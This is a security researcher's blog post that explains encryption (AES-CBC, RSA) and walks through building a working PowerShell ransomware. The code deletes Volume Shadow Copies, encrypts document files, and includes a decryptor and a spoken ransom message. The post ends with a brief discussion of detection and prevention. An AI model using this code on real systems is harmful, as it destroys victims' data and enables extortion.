I'm taking a little "side-quest" from my macOS introduction series to talk about ransomware.
Sometimes I do defensive security work - in this case, I'd like to explain why stopping ransomware is so challenging, as well as show how to create a ransomware in a minute.
This will also give us a nice opportunity to talk a bit about encryption.
Ransomware is a type of malware that has the sole purpose of encrypting files that are important to the target human.
After encryption, the ransomware "reveals" itself by announcing that files have been encrypted, demanging "ransom" for releasing them.
Basically, ransomware is just software that holds your data hostage.
While varying in sophistication, the "ransoming" part is the interesting part, which is what I'd like to touch.
When we talk about encryption, we basically talk about two classes:
- Symmetric encryption: encryption key and decryption key are the same.
- Asymmetric encryption: encryption key and decryption key are different.
While it sounds minor, this has huge implications. It's not an exaggeration to say that much of our modern society is built on these concepts!
For example, our bank transactions, online shopping, emails and everything else is (I hope!) protected by a network protocol called SSL\TLS.
That protocol uses both symmetric and asymmetric encryption to ensure several properties that ensure your privacy is safe.
Symmetric encryption has been around for hundreds of years (really!). When we talk about symmetric encryption, we generally have two categories:
- Block ciphers: the cryptosystem works on blocks of data, e.g. every encrypts every 16 bytes. This means that the plaintext has to be padded (which might be a source of vulnerabilities I might discuss in a future blogpost). In a naive implementation, block ciphers output the same encrypted block for two identical input blocks.
- Stream ciphers: the cryptosystem works on each byte of data. You can think of stream ciphers as a blackbox that gets a key and spits out an infinite stream of pseaudo-random bytes. Those bytes are
XOR'ed with the plaintext to create the encrypted data. This is also why stream ciphers are different from block ciphers with 1 byte - two identical plaintext bytes produce different encrypted output bytes. Think why that property is critical for the safety of the cryptosystem!
The most commonly used symmetric encryption nowadays is AES, which in its essence - a Block Cipher.
I've also seen ransomware use RC4 as well (which is a Stream cipher).
Because of the property that identical plaintext blocks produce identical encrypted output blocks (and obviously vice-versa), all Block ciphers can use a Mode of Operation. The Mode of Operation prevents that from happening by using additional information from each block as input to another block, and a new known initial block of information called an Initialization Vector (IV).
There are many Modes of Operation; one of the most prevalent one is CBC. CBC performs a XOR operation between the output of the previous block and the plaintext input of the next block. Here's some ASCII art that shows how that works, for instance, with AES:
Plaintext: P1 P2 P3 ... Pn
| | | |
| | | |
| | | |
IV ------> XOR |--> XOR |--> XOR ... |--> XOR
| | | | | | |
| | | | | | |
AES | AES | AES | AES
|-------| |-------| |---- ... ----| |
| | | |
V V V V
Ciphertext: C1 C2 C3 ... Cn
Note that:
IVis theinitialization vectorand it's a block size (16 bytes).P1,P2, ...Pnare theplaintextblocks, where the last block (Pn) is padded (we won't talk about padding today).C1,C2, ...Cnare theciphertextblocks.
If we mark IV as C0, we can make a nice formula: C[n] = AES-encrypt(P[n] XOR C[n-1]).
Note that I said AES is a Block Cipher (and it is), but there are Modes of Operation that turn Block Ciphers into Stream Ciphers - those include CTR (counter) and GCM (Galois-Counter Mode). We won't discuss those, but know these are possible.
In terms of security, Symmetric ciphers are very fast and very safe, and in fact, are quite resilient even against Quantum Computers. This is not a Quantum Computing blogpost, but I will mention that the best known algorithm to crack generic Symmetric encryption systems is Grover's algorithm which can be used to bruteforce a searchspace of keys in O(sqrt(N)) time complexity - which sounds amazing, until you realize doubling the key size for Symmetric Ciphers completely solves the problem.
Asymmetric encryption is much more modern. Imagine a scneaio where we all just use symmetric encryption - that means that to secure a line (let's say - between you and your bank) you'd have to exchange a secret (which is the symmetric key) with your bank by physically meeting them in a secure manner. Obviously that's not scalable.
That problem was solved by coming up with asymmetric encryption - we have two different keys now:
- A
private key- known only to the entity that generated the key. - A
public key- distributed everywhere.
The two keys have a mathematical relation between them that ensure privacy. We won't talk about how that works, but virtually all asymmetric cryptosystems rely on Number Theory and assumptions that there are several problems that are computationally hard unless there is knowledge of the private key.
A textbook example is the RSA cryptosystem that uses Fermat's Little Theorem on primes numbers, and relies on the computational difficulty of prime factorization.
This is not a math-focused blogpost, but I think it's simple enough to share:
- We choose two random large primes
pandq. Choosing random primes is not a trivial task, and usually done with the Miller-Rabin algorithm. - We set
N=pqand markphi=(p-1)(q-1). Thatphiis the value of the Euler Totient Function and counts the number of numbers belownthat are co-prime of it. - We choose a number
e. Usually you'll seee=65537- there are good reasons for that but they're out of scope for this post. - We find a number
dsuch thated=1 (mod phi). We say thatdis the modular inverse ofe(modphi), and find it using the Extended Euclidean Algorithm. - Now we mark
e, Nas thepublic keyandd, Nas theprivate key. - Public key operation:
c = m^e (mod N). - Private key operation:
m = c^d (mod N).
Note that computing phi for N without knowing its prime factors is computationally difficult, and without phi it's practically impossible to get the private key d.
One note about Quantum Computation (since I mentioned it earlier on Symmetric Encryption systems) is that some of those assumed computentionally difficult problems are known to be broken with a sufficiently powerful Quantum Computer, including RSA (you're welcome to read about Shor's Algorithm if you have the appetite!).
One noteworthy remark is that Asymmetric cryptosystems are tough; they require very long keys to be considered safe, and have noticable performance impacts. Also, some of them actually can't encrypt every message (but practically most messages). This is why many cryptosystems use Asymmetric encryption to exchange a secret, which is then used as a key to Symmetric ciphers.
Obviously, Ransomware needs to encrypt files. Given all the advantages of Symmetric encryption, we'd want to use that, but using a baked-in key for all files doesn't make sense, because:
- If someone reverse-engineers our ransomware they could simply extract they key (from disk, from memory etc).
- We'd want different keys for different target computers - assuming we supply a decryptor, we don't want that decryptor to be used on other computers.
- Decrypting one file (let's say, by exposing the encryption key) should not affect decryption of other files.
There are other reasons as well, but these are the obvious ones. Therefore, we'll do what we discussed earlier:
- The attacker generates a
private-public key pair, e.g. withRSA. - The attacker keeps their
private keyand create a ransomware instance with thepublic key. - One the ransomware instance tries to encrypt a file, it marks generates a random
AESkey andIV, encrypts the entire file with that AES key (let's say, withAES-CBC). - The ransomware adds to the file a magic value that says it was encrypted, followed by the
IVandAES keyencrypted with the RSA public key.
Why does that make sense?
- Each file is encrypted with a different symmetric key.
- To decrypt, the only practical way would be to get the symmetric key for each file, but that's encrypted by the public key.
- The only practical way to decrypt the encrypted symmetric key is with the private key, which only the attacker has!
When the attacker wants to decrypt, the only thing they need to do is supply the private key, which can be baked into the decryptor. The decryptor then:
- Traverses the entire filesystem, just like the encryptor did.
- For each file, checks if it has the magic value that marks it as encrypted (some ransomware uses different filenames instead).
- To decrypt - simply extract the encrypted
AESkey material and decrypt using the private key. Then, decrypt the entire file with the decryptedAESkey.
Let's code it!
While I dislike PowerShell, I will use it since it's pre-installed on every modern Windows OS box.
The first thing we'll have to do is generate an RSA keypair - i.e. a public key and a private key. We will save the public and private keys into xml files:
$rsa = New-Object System.Security.Cryptography.RSACryptoServiceProvider -ArgumentList 2048
$pubkey = $rsa.ToXmlString($false)
$pubkey | Out-File "public-key.xml"
$rsa.toXmlString($true) | Out-File "private-key.xml"There's nothing sophisticated here - first line creates an RSA "instance" with a key size of 2048 bits. This already generates the keypair. Then, we simply output the public key and private key to xml files.
Now, let's move to the juicy part - the encryptor.
The first thing I'd do is deleting all Volume Shadow Copies - that's a common technique for Ransomware, and I'd like to stay true to the purpose:
Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}At this point - we can start the encryption part:
$public_key_xml = "INSERT RSA PUBLIC KEY XML HERE"
$extensions = ".doc,docx,.pdf"
$ransom_extension = ".pwn"
$base_folder = [Environment]::GetFolderPath("MyDocuments")
$rsa = New-Object -TypeName System.Security.Cryptography.RSACryptoServiceProvider
$rsa.FromXmlString($public_key_xml)
$extensions = $extensions.Split(",") | % {"*" + $_.Trim()}- The
public keyis "baked-in" and saved in the$public_key_xmlvariable. - The set of file extensions is saved in the
$extensionsvariable. - The new file extention we will be using is is saved in
$ransom_extension. - We will look for all files under the
$base_folder, which is my case is the "Documents" folder, but you can do whatever you like. - We create a new
RSAinstance ($rsa) and import thepublic keyinto that instance.
Now we can iterate all the files and encrypt each one:
foreach ($f in (Get-ChildItem -Force -ErrorAction SilentlyContinue -Recurse -Path $base_folder -Include $extensions).fullname)
{
# Read the file bytes
$bytes = Get-Content $f -Encoding Byte -ReadCount 0
# Generate a new AES-CBC instance
$aes = [Security.Cryptography.SymmetricAlgorithm]::Create("AesManaged")
$aes.Mode = [Security.Cryptography.CipherMode]::CBC
$aes.Padding = "PKCS7"
# Generate a new AES random key and encrypt it with the IV using the RSA public key
$aes_key = 1..16|%{[byte](Get-Random -Minimum ([byte]::MinValue) -Maximum ([byte]::MaxValue))}
$aes_key_material = $aes_key + $aes.IV
$aes_key_material = $rsa.Encrypt($aes_key_material, $false)
# Encrypt the file bytes and append the AES key material
$aes_encryptor = $aes.CreateEncryptor($aes_key, $aes.IV)
$stream = New-Object -TypeName IO.MemoryStream
$enc_stream = New-Object -TypeName Security.Cryptography.CryptoStream -ArgumentList @($stream, $aes_encryptor, [Security.Cryptography.CryptoStreamMode]::Write)
$enc_stream.Write($bytes, 0, $bytes.Length)
$enc_stream.FlushFinalBlock()
$encrypted = $stream.ToArray()
$encrypted += $aes_key_material
# Override the file and rename it
Set-Content -Path $f -Value $encrypted -Encoding Byte -Force
Rename-Item -Path $f -NewName ($f + $ransom_extension)
# Clear important data from memory
$aes.Clear()
$stream.SetLength(0)
$stream.Close()
$enc_stream.Clear()
$enc_stream.Close()
}While the remarks are quite self-explanatory, I will mention a few things:
- We use
AES-CBCwithPKCS7padding. I did not discuss padding too much, butPKCS7is a standard that also defines how padding should look like (sinceAESis a Block Cipher). - The file contents are encrypted and the
RSA-encrypted key material is appended at the end of the encrypted file. - It's important to properly clear the
$aesinstance and the streams - not only for memory management but also to make sure they are not extracted from memory post-encryption.
Now that this part is done, we can do something fun like changing the desktop wallpaper, dropping ransom notes or using the Windows text-to-speech. Here's the text-to-speech part:
Add-Type -AssemblyName System.Speech
$voice = New-Object System.Speech.Synthesis.SpeechSynthesizer
$voice.SelectVoice("Microsoft Zira Desktop")
$voice.Rate = 0
$voice.Speak("All your files are belong to us")Decryption is quite easy:
$file_to_decrypt = "INSERT PATH TO FILE"
$private_key_xml = "INSERT RSA PRIVATE KEY XML HERE"
$rsa = New-Object -TypeName System.Security.Cryptography.RSACryptoServiceProvider
$rsa.FromXmlString($private_key_xml)
# Read encrypted file and split to encrypted contents and encrypted AES key material
$bytes = Get-Content $file_to_decrypt -Encoding Byte -ReadCount 0
$aes_key_material = $bytes[-256..-1]
$encrypted = $bytes[0..($bytes.Length - 256 - 1)]
# Decrypt AES key material and create an instance
$aes_key_material = $rsa.Decrypt($aes_key_material, $false)
$aes = [Security.Cryptography.SymmetricAlgorithm]::Create("AesManaged")
$aes.Mode = [Security.Cryptography.CipherMode]::CBC
$aes.Padding = "PKCS7"
# Decrypt the bytes
$aes_decryptor = $aes.CreateDecryptor($aes_key_material[0..15], $aes_key_material[16..31])
$stream = New-Object -TypeName IO.MemoryStream
$dec_stream = New-Object -TypeName Security.Cryptography.CryptoStream -ArgumentList @($stream, $aes_decryptor, [Security.Cryptography.CryptoStreamMode]::Write)
$dec_stream.Write($encrypted, 0, $encrypted.Length)
$dec_stream.FlushFinalBlock()
$plaintext = $stream.ToArray()
# Write file
Set-Content -Path $file_to_decrypt -Value $plaintext -Encoding Byte -ForceWe simply do the reverse of what we've done so far.
Here you get a nice demonstration of coding a ransomware really quick!
How do you detect such a thing? This is where I'd like to mention that detection is mostly too late at this stage - you want to prevent, not detect.
Even prevention is tough - there are a few strategies:
- Statically signing ransomware familities is not durable due to obfuscation and other techniques.
- Looking for suspicious scripts that use cryptographic libraries - not ideal due to durability issues (attacker can implement their own AES if necessary) and also because of potential false positives.
- Looking for many files modified in a short timespan with their overall entropy increasing - while good enough for some detection cases, not good for prevention.
There are other strategies of course, but the best idea is to realize those ransomware attacks do not happen in a vacuum - there will be other malicious activity before the encryption part itself (e.g. moving laterally, gaining higher privileges, etc.) - in fact, you can already see that in the part where I delete Volume Shadow Copies!
This is why I believe most ransomware "simulators" out there are useless - once sufficient privileges is gained, a creative attacker will always find a way to get around protections, assuming all other pre-ransom operations were not blocked.
In this blogpost, I showed how to create a ransomware with PowerShell in a few lines of code, but I really used that as an excuse to discuss the technical details of cryptography, which is what I hope you, the reader, will be focusing on in this blogpost.
I hope to continue blogging more about encryption - this was really only the tip of the iceberg!
Thanks!
Jonathan Bar Or